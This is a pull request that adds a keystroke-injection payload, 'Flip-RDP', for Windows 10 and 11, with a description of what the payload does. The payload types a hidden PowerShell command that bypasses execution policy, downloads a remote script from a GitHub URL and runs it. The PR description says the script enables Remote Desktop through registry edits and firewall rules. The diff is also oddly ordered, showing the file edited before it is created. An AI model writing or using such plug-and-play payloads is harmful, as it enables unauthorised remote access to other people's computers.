### PR TITLE
Add "Flip-RDP"

### DIFF
--- a/Payloads/Flip-RDP/activateRDP.txt
+++ b/Payloads/Flip-RDP/activateRDP.txt
@@ -1,8 +1,8 @@
-REM     Title: AcidBurn
+REM     Title: RDP
 
 REM     Author: UNC0V3R3D
 
-REM     Description: This payload is going to activate remote desktop.
+REM     Description: This payload is going to activate remote desktop and allow remote connections.
 
 REM     Target: Windows 10, 11
 

--- a/Payloads/Flip-RDP/activateRDP.txt
+++ b/Payloads/Flip-RDP/activateRDP.txt
@@ -1,0 +1,16 @@
+REM     Title: AcidBurn
+
+REM     Author: UNC0V3R3D
+
+REM     Description: This payload is going to activate remote desktop.
+
+REM     Target: Windows 10, 11
+
+REM     --------------------------------------------------------------------------------------
+REM     THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
+REM     --------------------------------------------------------------------------------------
+
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Ep Bypass iwr https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/rdpscript.ps1 | iex
+ENTER


### PR DESCRIPTION
1. Sets the value of the fDenyTSConnections registry key, located at HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server, to 0. This key controls whether remote connections to the server are allowed or denied. Setting the value to 0 allows remote connections.

2. Sets the value of the UserAuthentication registry key, located at HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp, to 1. This key controls whether Remote Desktop Protocol (RDP) authentication is required for connections to the server. Setting the value to 1 means that RDP authentication is required.

3. Enables the Remote Desktop and RemoteFX rules in the Windows Firewall using the netsh command. The Remote Desktop rule allows incoming connections to the Remote Desktop service, while the RemoteFX rule allows incoming connections to the RemoteFX service.

4. Exits the PowerShell session.